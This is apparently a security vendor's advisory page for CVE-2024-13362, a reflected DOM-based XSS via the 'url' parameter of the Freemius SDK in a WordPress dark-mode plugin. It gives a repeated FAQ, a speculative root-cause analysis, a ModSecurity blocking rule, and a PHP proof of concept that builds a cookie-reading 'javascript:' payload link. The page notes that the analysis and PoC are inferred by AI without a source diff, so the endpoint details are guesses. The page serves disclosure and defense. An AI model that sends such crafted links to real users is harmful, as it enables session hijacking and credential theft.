What is CVE-2024-13362?

CVE-2024-13362 is a reflected DOM-based cross-site scripting vulnerability affecting the Freemius SDK used in WordPress plugins, specifically the Dracula Dark Mode plugin version 1.2.7. It allows attackers to inject arbitrary scripts via the ‘url’ parameter due to insufficient input sanitization.

How does this vulnerability work?

The vulnerability allows an attacker to craft a malicious URL containing a script payload in the ‘url’ parameter. If a user clicks on this link, the script executes in their browser, potentially leading to session hijacking or other malicious actions.

Who is affected by CVE-2024-13362?

Any WordPress site using the Dracula Dark Mode plugin version 1.2.7 is affected. Administrators should check their plugin versions and update if they are using the vulnerable version.

How can I check if my site is vulnerable?

To check for vulnerability, verify if you are using the Dracula Dark Mode plugin version 1.2.7. Additionally, review your site for any instances where the ‘url’ parameter is processed without proper sanitization.

What is the severity level of this vulnerability?

CVE-2024-13362 has a medium severity rating with a CVSS score of 6.1. This indicates that while the vulnerability can be exploited, it requires user interaction, which somewhat mitigates the risk compared to vulnerabilities that can be exploited remotely without user action.

What are the potential impacts of this vulnerability?

If exploited, this vulnerability can allow attackers to execute arbitrary JavaScript in the victim’s browser. This may lead to session hijacking, credential theft, or redirection to malicious sites, especially if the victim has administrative privileges.

How can I fix or mitigate this vulnerability?

To mitigate this vulnerability, update the Dracula Dark Mode plugin to a version that addresses the issue. Additionally, ensure that any handling of the ‘url’ parameter includes proper sanitization and encoding before being inserted into the DOM.

What coding practices should be followed to prevent similar vulnerabilities?

Developers should always sanitize and escape user inputs before rendering them in the DOM. Utilize functions like `esc_url()` and `wp_kses()` in WordPress to validate and sanitize URLs, and prefer `textContent` over `innerHTML` for inserting content into the DOM.

What does the proof of concept demonstrate?

The proof of concept illustrates how an attacker can create a malicious URL that exploits the vulnerability by injecting a JavaScript payload. It shows the mechanics of crafting the URL and how the payload executes when the victim interacts with it.

What should I do if I suspect my site has been exploited?

If you suspect exploitation, immediately review your site for unauthorized changes, check user sessions, and reset passwords for affected accounts. It is also advisable to conduct a security audit and update all plugins and themes to their latest versions.

Is there a timeline for fixes or updates regarding this vulnerability?

Monitor the official WordPress plugin repository and the developers’ communications for updates regarding this vulnerability. It is crucial to apply updates as soon as they are released to mitigate risks.

Can this vulnerability affect other plugins using the Freemius SDK?

Yes, other plugins utilizing the Freemius SDK may also be affected if they handle the ‘url’ parameter similarly without proper sanitization. It is important to assess all plugins that depend on Freemius for potential vulnerabilities.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : May 10, 2026

CVE-2024-13362: Freemius <= 2.10.1 – Reflected DOM-Based Cross-Site Scripting via url Parameter (dracula-dark-mode)

CVE ID CVE-2024-13362

Plugin dracula-dark-mode

Severity Medium (CVSS 6.1)

CWE 79

Vulnerable Version 1.2.7

Patched Version —

Disclosed April 29, 2026

Analysis Overview

Atomic Edge analysis of CVE-2024-13362 (metadata-based): This is a reflected DOM-based cross-site scripting vulnerability in the Freemius software development kit (SDK) used by multiple WordPress plugins and themes, with the specific vulnerable instance being the Dracula Dark Mode plugin version 1.2.7. The vulnerability carries a CVSS score of 6.1 (medium severity) and requires user interaction via a crafted link.

The root cause, inferred from the CWE-79 classification and the description, is insufficient input sanitization and output escaping on the ‘url’ parameter. In typical WordPress plugin implementations, Freemius handles analytics, opt-in/opt-out flows, and connection callbacks. The vulnerable parameter is likely passed through a JavaScript context (making it DOM-based) without proper encoding. Atomic Edge research cannot confirm the exact code path because no source code diff is available, but the pattern strongly suggests the ‘url’ parameter is read via JavaScript (e.g., `window.location.search` or `URLSearchParams`) and written directly to the DOM via `innerHTML` or similar methods without sanitization.

Exploitation requires an attacker to craft a malicious URL containing the XSS payload in the ‘url’ parameter. The target endpoint is likely a Freemius SDK callback or a plugin settings page that processes the ‘url’ parameter client-side. The attacker must trick an authenticated or unauthenticated user into clicking the crafted link. Since the vulnerability is reflected and DOM-based, the payload executes in the user’s browser without server-side storage, allowing the attacker to steal session cookies, perform actions on behalf of the victim, or deface the page.

Remediation requires escaping the ‘url’ parameter before inserting it into the DOM. The fix should use `textContent` instead of `innerHTML`, or apply proper URL encoding/sanitization via `encodeURI()` or browser-native URL parsing functions. Server-side validation should also reject or sanitize the ‘url’ parameter using WordPress functions like `esc_url()` or `wp_kses()` before passing the value to the frontend.

If exploited, an attacker can execute arbitrary JavaScript in the victim’s browser context. This leads to session hijacking, credential theft (if the victim is an admin), redirection to malicious sites, or defacement. The impact is amplified if the victim has elevated privileges, potentially leading to full site compromise.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2024-13362 (metadata-based)
# Block reflected DOM-based XSS via Freemius 'url' parameter
# This rule blocks requests with script tags or event handlers in the url parameter

SecRule REQUEST_URI "@rx (?:admin-ajax.php|admin-post.php)" 
  "id:20261994,phase:2,deny,status:403,chain,msg:'CVE-2024-13362 Reflected DOM XSS via Freemius url parameter',severity:'CRITICAL',tag:'CVE-2024-13362',tag:'wordpress',tag:'xss'"
  SecRule ARGS:url "@rx <script|javascript:|onerror=|onload=|onclick=" 
    "t:lowercase,t:urlDecodeUni,t:removeNulls,chain"
    SecRule ARGS:action "@streq freemius_optin" 
      "t:none"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2024-13362 - Freemius <= 2.10.1 - Reflected DOM-Based XSS via url Parameter

// This PoC sends a crafted URL to an unauthenticated victim.
// The payload executes when the victim clicks the link.
// Assumption: The vulnerable parameter is 'url' on a Freemius callback page.

$target_url = 'http://example.com'; // CHANGE THIS to the target WordPress site URL

$payload = 'javascript:alert(document.cookie)'; // XSS payload

// Craft the malicious URL
$malicious_url = $target_url . '/wp-admin/admin-ajax.php?action=freemius_optin&url=' . urlencode($payload);

// For demonstration, output the crafted URL
// In a real attack, this URL would be sent to the victim via email, social media, etc.
echo "[+] Crafted malicious URL:n";
echo $malicious_url . "nn";

// Send a request to confirm the vulnerability (optional, for testing on authorized targets only)
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $malicious_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$response = curl_exec($ch);
curl_close($ch);

// Check if the payload is reflected (for testing purposes)
if (strpos($response, htmlspecialchars($payload)) !== false) {
    echo "[!] Vulnerability confirmed: payload reflected in response.n";
} else {
    echo "[+] No immediate reflection detected (DOM-based XSS may still trigger).n";
}

Frequently Asked Questions

What is CVE-2024-13362?
Overview of the vulnerability
CVE-2024-13362 is a reflected DOM-based cross-site scripting vulnerability affecting the Freemius SDK used in WordPress plugins, specifically the Dracula Dark Mode plugin version 1.2.7. It allows attackers to inject arbitrary scripts via the ‘url’ parameter due to insufficient input sanitization.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability allows an attacker to craft a malicious URL containing a script payload in the ‘url’ parameter. If a user clicks on this link, the script executes in their browser, potentially leading to session hijacking or other malicious actions.
Who is affected by CVE-2024-13362?
Identifying vulnerable installations
Any WordPress site using the Dracula Dark Mode plugin version 1.2.7 is affected. Administrators should check their plugin versions and update if they are using the vulnerable version.
How can I check if my site is vulnerable?
Steps for verification
To check for vulnerability, verify if you are using the Dracula Dark Mode plugin version 1.2.7. Additionally, review your site for any instances where the ‘url’ parameter is processed without proper sanitization.
What is the severity level of this vulnerability?
Understanding risk assessment
CVE-2024-13362 has a medium severity rating with a CVSS score of 6.1. This indicates that while the vulnerability can be exploited, it requires user interaction, which somewhat mitigates the risk compared to vulnerabilities that can be exploited remotely without user action.
What are the potential impacts of this vulnerability?
Consequences of exploitation
If exploited, this vulnerability can allow attackers to execute arbitrary JavaScript in the victim’s browser. This may lead to session hijacking, credential theft, or redirection to malicious sites, especially if the victim has administrative privileges.
How can I fix or mitigate this vulnerability?
Recommended remediation steps
To mitigate this vulnerability, update the Dracula Dark Mode plugin to a version that addresses the issue. Additionally, ensure that any handling of the ‘url’ parameter includes proper sanitization and encoding before being inserted into the DOM.
What coding practices should be followed to prevent similar vulnerabilities?
Best practices for secure coding
Developers should always sanitize and escape user inputs before rendering them in the DOM. Utilize functions like `esc_url()` and `wp_kses()` in WordPress to validate and sanitize URLs, and prefer `textContent` over `innerHTML` for inserting content into the DOM.
What does the proof of concept demonstrate?
Understanding the exploit
The proof of concept illustrates how an attacker can create a malicious URL that exploits the vulnerability by injecting a JavaScript payload. It shows the mechanics of crafting the URL and how the payload executes when the victim interacts with it.
What should I do if I suspect my site has been exploited?
Response to potential exploitation
If you suspect exploitation, immediately review your site for unauthorized changes, check user sessions, and reset passwords for affected accounts. It is also advisable to conduct a security audit and update all plugins and themes to their latest versions.
Is there a timeline for fixes or updates regarding this vulnerability?
Monitoring for updates
Monitor the official WordPress plugin repository and the developers’ communications for updates regarding this vulnerability. It is crucial to apply updates as soon as they are released to mitigate risks.
Can this vulnerability affect other plugins using the Freemius SDK?
Broader implications
Yes, other plugins utilizing the Freemius SDK may also be affected if they handle the ‘url’ parameter similarly without proper sanitization. It is important to assess all plugins that depend on Freemius for potential vulnerabilities.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations